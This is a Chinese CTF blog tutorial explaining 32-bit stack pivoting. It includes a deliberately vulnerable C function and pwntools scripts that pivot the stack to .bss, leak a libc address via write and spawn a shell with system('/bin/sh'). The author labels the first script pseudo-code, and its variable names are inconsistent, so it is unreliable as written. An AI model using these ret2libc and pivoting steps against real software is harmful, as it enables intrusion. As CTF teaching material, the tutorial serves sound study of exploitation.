Linux PWN技巧之栈迁移

已于 2022-02-17 21:21:23 修改
阅读量1.7k 收藏 13
点赞数 3
分类专栏: pwn linux 文章标签: linux ctf 二进制
于 2022-02-16 18:52:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flurry_rain/article/details/122966176
版权
linux 同时被 2 个专栏收录
31 篇文章 0 订阅
订阅专栏
pwn
13 篇文章 1 订阅
订阅专栏

简介

栈迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让栈帧指向一段我们可以控制的内存,从而实现控制栈上执行内容、控制程序执行流程的目的
栈迁移一般会将栈帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决栈上空间太小,不够写入完整payload的情况。比如有个程序存在栈溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到栈迁移的技巧了

利用介绍

以32位程序为例,描述一下栈迁移的核心思想。

首先要理解leave和ret汇编指令的作用:

  • leave指令做了两步操作:mov ebp,esp 将ebp寄存器的值赋值给esp寄存器,这样esp和ebp寄存器都指向同一块内存了;然后是 pop ebp 将esp寄存器指向的内存的值赋值给ebp,同时esp寄存器保存的地址增加四个字节,也就是指向上一个栈块(栈空间是从高地址向低地址增长的)
  • ret指令相当于 pop eip,将当前esp寄存器指向的内存的内容赋值给eip寄存器,这样下一步就会去执行更新后的eip寄存器指向的内容了,同时esp寄存器会指向上一个栈块

在32位指令集中,call指令执行完成后都会执行leave和ret指令来退出call指令,继续往下执行,因此我们可以利用栈溢出来修改栈上的值结合leave ret指令来实现控制esp ebp指针,进而实现栈迁移,让程序执行流程进入到被我们控制的内存

要实现栈迁移,需要至少执行两次写入操作,一次用于向可读写内存区(比如.bss段)写入rop链,第二次用于触发栈溢出,将esp寄存器指向上一步写入的rop链所在的内存区,同时还需要执行两次leave ret操作,一次用于触发栈溢出修改后的函数ret地址,一次用于将ebp esp寄存器指向rop链的内存区完成迁移动作,下面举个例子来说明一下。

举个栗子

漏洞代码

char s[0x100];
void vuln()
{	
	setbuf(s, 0);
	
	char buf[24];
	char strs[] = "input your name: \n";
	int strlens = strlen(strs);
	wirite(1, strs, strlens);
	read(0, s, 0x100);
	printf("input somthing: \n");
	read(0, buf, 0x20);	
	return;
}

利用思路

将上述代码编译为32位程序,关闭PIE和Canary
上面这段代码可以很明显看出来,第二个read处存在栈溢出,但溢出长度只有0x30-24=24字节,结合gdb分析发现这个长度能覆盖到返回地址,但无法装下完整的rop链,因此需要使用栈迁移。

这个程序会执行两次read操作,第一次是往全局变量s中写入,s是一个没有初始化的全局变量,因此它的位置应该是在bss段,使用gdb调试验证也确实如此,因此可以利用这次read将rop链写入到bss段,然后在利用第二次read触发栈溢出,构造两次leave ret操作,修改esp寄存器,完成迁移动作,触发rop链。

解决了rop链的存放问题后,下一步需要利用ret2libc来完成getshell操作:使用write泄露出write函数的加载地址,然后结合libc的偏移地址,计算出libc.so加载的基地址,然后获取到libc中的system以及/bin/sh字符串的加载地址,即可getshell。

伪exp脚本

下面结合伪代码分析一下利用思路:


# 首先要通过逆向分析拿到leave ret操作的gadget地址,记录为leave_ret变量
# 拿到溢出长度,记录为 offset 变量,注意offset应正好覆盖到ebp寄存器指向的内存,不是直接覆盖ret地址
# 然后拿到main函数的地址, 记录为 main_sym 变量
# 然后拿到read函数的plt地址,记录为 read_plt 变量
# 然后拿到wirte函数的plt地址和got地址,分别记录为write_plt write_got
# 然后拿到全局变量s的起始地址,记录为 bss_addr 变量
# 构造第一个rop链,这个链的作用是泄露出write函数的加载地址,然后返回main函数,从头执行程序,这个rop链的起始地址位于bss_addr处
rop1 = p32(write_plt) + p32(main_sym) + p32(1) + p32(write_got) + p32(4)

# 触发栈溢出漏洞,执行完后,bss_addr - 4正好覆盖掉ebp寄存器的值,leave_ret正好覆盖掉vuln函数的ret地址
payload1 = offset * b'a' + p32(bss_addr - 4) + p32(leave_ret)

p = process("./test") # 拉起漏洞程序
p.recvuntil("input your name: \n")
p.send(rop1) # 将第一个rop链写入到bss段
p.recvuntil("input somthing: \n")
p.send(payload1) # 将第一个payload输出栈中,利用栈溢出重写栈上的值,触发栈溢出漏洞
write_addr = u32(r.recv(4)) # 利用rop1获取到write函数的加载地址,并返回main函数,重新执行
libc_base = write_addr - libc.symbols["write"] # 利用write函数的加载地址获取libc的基地址
system_addr = base_addr + libc.symbols["system"] # 获取system的加载地址
binsh_addr = base_addr + libc.search("/bin/sh").next() # 获取/bin/sh字符串的加载地址
#构造第二个rop链,获取shell
rop3 = p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
p.recvuntil("input your name: \n")
p.send(rop2)

# 重新触发栈溢出漏洞,完成栈迁移,执行rop2链得到shell
payload2 = offset*b'a' + p32(bss_addr-4) + p32(leave_ret_addr)
p.recvuntil("input somthing: \n")
p.send(payload2)
p.interactive()

这里讲一下为什么第一次payload中,ebp要指向rop地址的上一个地址也就是bss_base - 4。其实很简单,因为我们覆盖完ebp的值后,下一步是ret到了leave_ret所在的gadget,执行了leave操作,而leave操作会先把esp修改为bss_base - 4,然后把bss_base - 4 内存里的值pop给ebp,这时esp会自动指向上一个栈块,因为栈的增长方向是从高地址向低地址的,所以指向上一个栈块的操作其实是esp指向的地址加4字节也就是esp + 4,而我们的目标是让esp正好指向rop链的第一步,这样下一步执行ret就会pop到eip从而开始执行rop链了,所以要保证esp + 4 == bss_base,因此ebp要指向bss_base - 4!

别人的轮子

上面的exp是手动实现了一下栈迁移的操作,目的是方便理解原理,其实核心就是利用leave|ret 来完成对esp寄存器的操作,在实际应用中,可以使用python的pwntools库提供的migrate方法一句话实现栈迁移操作,这里用一个栈溢出的exp为例:

from pwn import *

elf = ELF('./test')
rop = ROP('./test')

bss = elf.bss()
stack_size = 0x100 # 设置栈长度
base_stage = bss_addr + stack_size # 确定栈要迁入的地址
# 构造栈迁移的rop链
offset = 112 # 确定栈溢出覆盖到返回地址的长度,本例中为112
rop.raw(offset * 'a')
rop.read(0, base_stage, 100) # 利用栈溢出漏洞,触发read指令,向base_stage中写入下一步rop链,用于完成下一步的攻击,这里假定rop链的长度为100字节
rop.migrate(base_stage) # 完成栈迁移操作,执行完该指令后esp就指向base_stage了

p = process('./test')
p.recv()
p.send(rop) # 发送rop链,触发栈溢出漏洞,等待往我们构造的栈里写入下一步的rop链
# 构造新的rop链,新的rop链的作用是从base_stage + 80出读出我们写入的sh字符串
rop = ROP('./main_partial_relro_32')
sh = "/bin/sh"
rop.write(1, base_stage + 80, len(sh))
rop.raw('a' * (80 - len(rop.chain()))) # 填充字符,直到base_stage + 80处
rop.raw(sh) # 在base_stage + 80处填入sh字符串
rop.raw('a' * (100 - len(rop.chain()))) # 填充rop长度为100字节,因为上一个rop链读入了100字节
p.send(rop) # 发送新的rop链,写入到base_stage
# 第一个rop继续往下执行,esp寄存器指向了base_stage,再往下执行即可触发第二段rop链的write指令
p.interactive()

参考博客

https://icode9.com/content-4-1094763.html

flurry_rain
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Black Watch 入群题]PWN-迁移
个人笔记
04-20 347
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
迁移基础
Civit_的博客
03-27 166
迁移就是控制E/RBP、E/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现程序执行流的目的。​ 溢出攻击时,一个条件就是上有充分的空间可以布局。当溢出空间不够时,就需要迁移来解决了。
[PWN]——迁移及部分基础
最新发布
ysy___ysy的博客
04-18 1096
由高到低,自顶向下增长,ebp指向底 【减(push)即指针向高移,加(pop)即指针向低移】。溢出能使我们覆盖上某些区域的值,甚至是当前函数的返回地址 ret;一旦 ret 覆盖为某个奇怪的值,例如 0xdeadbeaf,当函数结束恢复现场,即 eip 指向 ret 时,程序将会跳转到内存中的 0xdeadbeaf 处。此时,内核会立即告诉我们“SIGSEV”,即常见的段错误(Segment Fault)。注意:函数传参时从右往左。
PWN题型之栈迁移
swedsn
07-30 1436
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 643
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
PWN · 迁移】[BUUCTF][Black Watch 入群题]PWN
Mr_Fmnwon的博客
08-01 358
进能够覆盖ebp和ret,很难不往迁移上想。 修改ebp和ret后我们可以将指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
Linux pwn入门教程(1)——溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——溢出基础
i 春秋月刊第六期:Linux pwn 零基础入门
10-23
i 春秋月刊第六期:Linux pwn 零基础入门
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\溢出基础\格式化字符串漏洞等
pwn--迁移
苗_的博客
08-26 515
七夕快乐~咕呱~ 前言 迁移主要是为了解决溢出时溢出空间大小不足的问题,当我们的rop链过长时很可能空间不够,并且ebp之前的空间其实只是填充一些没什么用的数据 原理 与传统的pop_ret类似,迁移是利用level_ret这样的gadgets实现迁移,都是寻找很小短的零碎代码,进行拼接。 关于gadget的定义: gadget在英文中意为小配件,在构造ROP链时,主要是指一对pop|ret指令,其功能在于可以配置一个寄存器的值,并返回至指定地址。常常用来在64位pwn的寄存器
[Black Watch 入群题]PWN之栈迁移
wuyvle的博客
02-22 197
进去康康函数结构 第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18 不过可以用第一个read构造ROP链,且刚好在bss段中,之后迁移到该地址执行,后面就是常规的泄露libc来getshell 迁移 首先来介绍一下迁移是什么? 以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 这些操作是用来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。 执行完函数后.
【SCTF&&CCTF 2016】 PWN_WRITEUP
wintersun的地带
05-15 3680
这里是摘要吗
Pwn】BUUCTF ciscn_2019_s_4 wp 迁移
Lcw_linyx的博客
05-20 487
个人日记= =,记录pwn自己的自闭过程
PWN溢出
u012173720的博客
11-21 1526
Shellcode --修改返回地址,让其指向溢出数据中的一段指令 根据上面副标题的说明,要完成的任务包括:在溢出数据内包含一段攻击指令,用攻击指令的起始地址覆盖掉返回地址。攻击指令一般都是用来打开 shell,从而可以获得当前进程的控制权,所以这类指令片段也被成为“shellcode”。shellcode 可以用汇编语言来写再转成对应的机器码,也可以上网搜索直接复制粘贴,这里就不再赘述。下面...
pwn学习总结
Ree的整理与收集
09-01 5740
遇到的优秀文章 关于Heap Overflow(堆溢出) Linux常见漏洞利用技术实践 GCC 中的编译器堆保护技术 Linux环境进程间通信(一) 现代Linux操作系统的溢出(一) 解读Linux安全机制之栈溢出保护工具与常用命令*nix命令 export ...="..." 添加一个环境变量,这个环境变量只在这个shell进程中起作用 gdbgdb的话一定会装peda插件。p
从一道简单的pwn题 认识 转移
qq_41071646的博客
04-27 494
这个题 好像是 bugku的 但是好像这个题 给换了 这个是 64位的程序 这个题 难搞点就是 空间不够 可以看的出来 我们s的地方是 rbp-0x10的地方 那么 返回地址 应该就是 rbp-0x18的地址 如果我们想把这个搞定 那么 要考虑一下 转移 转移 有很多高级的用法 这里 就浅显的说一些简单的 转移 转移 其实就是利用的是这两个...
溢出-pwn
weixin_44642009的博客
03-11 521
打开命名为pwn的可执行文件,将其用IDA静态调试器打开 简易进行相关汇编代码的分析,基本了解的结构 按F5对汇编代码进行反汇编,得到源代码 对setvbuf代码进行简单学习,也算是增长新知识,如下: 功 能: 把缓冲区与流相关; 用 法: int setvbuf(FILE *stream, char *buf, int type, unsigned size); 参数:stream:指向流...
pwn printf 泄露地址
08-19
对于泄露地址,你可以利用格式化字符串漏洞来实现。首先,你需要找到一个可以输出中数据的地方,比如可以通过 `printf` 函数打印的地方。 然后,你可以构造一个格式化字符串,使用 `%x` 格式来读取中的数据。通过不断调整格式化字符串的位置和参数,你可以逐步泄露中的数据。 具体步骤如下: 1. 通过 `%p` 格式化字符串来获取 `printf` 函数在内存中的地址。 2. 分析布局,找到你感兴趣的上变量的相对偏移。 3. 构造格式化字符串,使用 `%x` 格式读取中数据,通过调整参数位置和偏移量,逐步泄露上的数据。 需要注意的是,在实际利用中,你可能需要多次尝试和调整格式化字符串的参数和偏移量,以便准确地泄露目标数据。另外,在漏洞利用过程中,请务必遵循合法和道德的原则,并且只在授权范围内进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值